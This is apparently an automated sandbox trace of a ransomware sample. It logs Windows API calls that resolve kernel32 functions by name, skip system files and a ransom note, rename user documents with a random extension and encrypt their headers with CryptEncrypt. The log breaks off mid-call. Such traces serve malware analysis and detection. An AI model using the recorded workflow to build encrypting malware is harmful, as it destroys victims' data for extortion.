lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0084.561] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0084.561] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0084.561] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0084.561] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0084.561] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0084.561] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0084.561] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0084.562] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0084.562] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0084.562] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0084.562] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0084.562] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0084.562] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0084.562] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0084.562] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0084.562] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0084.562] lstrlenA (lpString="CTRLROUTINE") returned 11 [0084.562] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0084.562] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0084.562] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0084.562] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0084.562] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0084.562] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0084.562] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0084.562] lstrlenA (lpString="DEBUGBREAK") returned 10 [0084.562] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0084.562] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0084.562] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0084.562] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0084.562] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0084.562] lstrlenA (lpString="DECODEPOINTER") returned 13 [0084.562] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0084.562] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0084.562] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0084.562] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0084.562] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0084.562] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0084.562] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0084.562] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0084.562] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0084.562] lstrlenA (lpString="DELETEATOM") returned 10 [0084.562] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0084.562] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0084.562] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0084.563] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0084.563] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0084.563] lstrlenA (lpString="DELETEFIBER") returned 11 [0084.563] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0084.563] lstrlenA (lpString="DELETEFILEA") returned 11 [0084.563] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0084.563] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0084.563] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0084.563] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0084.563] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0084.563] lstrlenA (lpString="DELETEFILEW") returned 11 [0084.563] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0084.563] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0084.563] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0084.563] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0084.563] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0084.563] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0084.563] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0084.563] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0084.563] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0084.563] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0084.563] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0084.563] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0084.563] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0084.563] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0084.563] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0084.563] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0084.563] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0084.563] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0084.563] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0084.563] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0084.563] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0084.563] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0084.563] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0084.563] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0084.563] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0084.563] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0084.563] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0084.564] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0084.564] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0084.564] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0084.564] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0084.564] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0084.564] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0084.564] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0084.564] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0084.564] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0084.564] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0084.564] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0084.564] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0084.564] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0084.564] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0084.564] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0084.564] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0084.564] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0084.564] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0084.564] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0084.564] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0084.564] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0084.564] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0084.564] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0084.564] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0084.564] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0084.564] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0084.564] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0084.564] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0084.564] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0084.564] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0084.564] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0084.564] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0084.564] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0084.564] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0084.564] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0084.564] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0084.565] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0084.565] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0084.565] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0084.565] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0084.565] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0084.565] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\AVwBYYGM.csv") returned 96 [0084.565] wsprintfW (in: param_1=0x3f2d9ac, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\AVwBYYGM.csv.xjQs") returned 101 [0084.565] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\AVwBYYGM.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\i4oueks0y1j5q3bji\\hvipcfvk\\avwbyygm.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\AVwBYYGM.csv.xjQs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\i4oueks0y1j5q3bji\\hvipcfvk\\avwbyygm.csv.xjqs"), dwFlags=0x0) returned 1 [0084.565] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.566] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.566] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.566] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae8ee160, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xae8ee160, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae8ee160, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0084.566] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0084.566] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae8ee160, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xae8ee160, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae8ee160, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0084.566] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0084.566] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0084.566] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0084.566] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0084.566] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0084.566] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0084.566] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0084.566] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0084.566] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0084.566] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0084.566] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0084.566] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0084.567] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0084.567] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0084.567] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0084.567] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\") returned 84 [0084.567] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0084.567] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\" [0084.567] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\jkbimi8.tmp" [0084.567] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.567] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\i4oueks0y1j5q3bji\\hvipcfvk\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0084.567] CloseHandle (hObject=0x0) returned 0 [0084.567] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.567] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd193a000, ftCreationTime.dwHighDateTime=0x1d4d41d, ftLastAccessTime.dwLowDateTime=0xa86e8710, ftLastAccessTime.dwHighDateTime=0x1d4ce48, ftLastWriteTime.dwLowDateTime=0xa86e8710, ftLastWriteTime.dwHighDateTime=0x1d4ce48, nFileSizeHigh=0x0, nFileSizeLow=0x2b1a, dwReserved0=0x0, dwReserved1=0x0, cFileName="XNO92 a6pPV izRss.pps", cAlternateFileName="XNO92A~1.PPS")) returned 1 [0084.567] lstrcmpiW (lpString1="XNO92 a6pPV izRss.pps", lpString2="DECRYPT-FILES.txt") returned 1 [0084.567] lstrcmpiW (lpString1="XNO92 a6pPV izRss.pps", lpString2="autorun.inf") returned 1 [0084.567] lstrcmpiW (lpString1="XNO92 a6pPV izRss.pps", lpString2="boot.ini") returned 1 [0084.567] lstrcmpiW (lpString1="XNO92 a6pPV izRss.pps", lpString2="desktop.ini") returned 1 [0084.567] lstrcmpiW (lpString1="XNO92 a6pPV izRss.pps", lpString2="ntuser.dat") returned 1 [0084.567] lstrcmpiW (lpString1="XNO92 a6pPV izRss.pps", lpString2="iconcache.db") returned 1 [0084.568] lstrcmpiW (lpString1="XNO92 a6pPV izRss.pps", lpString2="bootsect.bak") returned 1 [0084.568] lstrcmpiW (lpString1="XNO92 a6pPV izRss.pps", lpString2="ntuser.dat.log") returned 1 [0084.568] lstrcmpiW (lpString1="XNO92 a6pPV izRss.pps", lpString2="thumbs.db") returned 1 [0084.568] lstrcmpiW (lpString1="XNO92 a6pPV izRss.pps", lpString2="Bootfont.bin") returned 1 [0084.568] lstrlenW (lpString="XNO92 a6pPV izRss.pps") returned 21 [0084.568] lstrcmpiW (lpString1="pps", lpString2="lnk") returned 1 [0084.568] lstrcmpiW (lpString1="pps", lpString2="exe") returned 1 [0084.568] lstrcmpiW (lpString1="pps", lpString2="sys") returned -1 [0084.568] lstrcmpiW (lpString1="pps", lpString2="dll") returned 1 [0084.568] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\") returned 84 [0084.568] lstrlenW (lpString="XNO92 a6pPV izRss.pps") returned 21 [0084.568] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\" [0084.568] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\", lpString2="XNO92 a6pPV izRss.pps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\XNO92 a6pPV izRss.pps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\XNO92 a6pPV izRss.pps" [0084.568] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.568] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\XNO92 a6pPV izRss.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\i4oueks0y1j5q3bji\\hvipcfvk\\xno92 a6ppv izrss.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0084.568] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2d978 | out: lpFileSize=0x3f2d978*=11034) returned 1 [0084.568] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0084.568] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0084.568] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0084.569] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0084.569] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.569] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2d8e0*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2d8e0*=0x100) returned 1 [0084.569] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0084.569] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.570] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0084.570] CloseHandle (hObject=0x444) returned 1 [0084.570] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.570] WriteFile (in: hFile=0x440, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d900, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2d900*=0x108, lpOverlapped=0x0) returned 1 [0084.571] CloseHandle (hObject=0x0) returned 0 [0084.571] CloseHandle (hObject=0x440) returned 1 [0084.571] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.571] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.571] GetTickCount () returned 0x114d9ad [0084.571] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.572] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0084.572] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0084.572] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.572] lstrlenA (lpString="kernel32.dll") returned 12 [0084.572] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0084.572] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0084.572] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0084.572] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0084.572] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0084.573] lstrcpyA (in: 